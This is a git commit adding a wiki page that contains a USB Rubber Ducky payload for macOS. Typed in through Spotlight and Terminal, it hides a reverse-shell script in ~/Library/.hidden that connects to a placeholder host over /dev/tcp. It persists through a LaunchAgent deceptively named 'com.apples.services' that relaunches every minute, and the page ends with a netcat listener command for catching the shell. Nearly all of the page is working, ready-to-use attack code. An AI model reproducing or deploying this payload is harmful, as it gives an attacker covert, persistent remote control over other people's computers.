Created Payload - OSX User Backdoor (rdoc)

2013-06-26 08:05:08 -07:00 · 2013-06-26 08:05:08 -07:00 · 9359e6eaae
parent 064a583f0e
commit 9359e6eaae
1 changed files with 79 additions and 0 deletions
--- a/Payload----OSX-User-Backdoor.rdoc
+++ b/Payload----OSX-User-Backdoor.rdoc
@ -0,0 +1,79 @@
+* Author - Patrick Mosca
+* Insert ducky. This script will created a persistent backdoor as the current user. It works by injecting code into a terminal from Spotlight. This payload was encoded with v2.4 on firmware duck_v2.1.hex. Change to your IP address or domain name and port number. 
+* A good tutorial on the payload here: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
+
+
+ REM Patrick Mosca
+ REM A simple script for creating a persistent backdoor on OSX.
+ REM Change mysite.com to your domain name or IP address
+ REM Change 1337 to your port number
+ REM Catch the shell with 'nc -l -p 1337'
+ REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
+ DELAY 1000
+ GUI SPACE
+ STRING terminal
+ DELAY 500
+ ENTER
+ DELAY 500
+ STRING mkdir ~/Library/.hidden
+ ENTER
+ DELAY 200
+ STRING echo '#!/bin/bash
+ ENTER
+ STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
+ ENTER
+ STRING wait' > ~/Library/.hidden/connect.sh
+ ENTER
+ DELAY 500
+ STRING chmod +x ~/Library/.hidden/connect.sh
+ ENTER
+ DELAY 200
+ STRING mkdir ~/Library/LaunchAgents
+ ENTER
+ DELAY 200
+ STRING echo '<plist version="1.0">
+ ENTER
+ STRING <dict>
+ ENTER
+ STRING <key>Label</key>
+ ENTER
+ STRING <string>com.apples.services</string>
+ ENTER
+ STRING <key>ProgramArguments</key>
+ ENTER
+ STRING <array>
+ ENTER
+ STRING <string>/bin/sh</string>
+ ENTER
+ STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
+ ENTER
+ STRING </array>
+ ENTER
+ STRING <key>RunAtLoad</key>
+ ENTER
+ STRING <true/>
+ ENTER
+ STRING <key>StartInterval</key>
+ ENTER
+ STRING <integer>60</integer>
+ ENTER
+ STRING <key>AbandonProcessGroup</key>
+ ENTER
+ STRING <true/>
+ ENTER
+ STRING </dict>
+ ENTER
+ STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
+ ENTER
+ DELAY 200
+ GUI q 
+ 
+Catch the shell with netcat:
+
+ nc -l -p 1337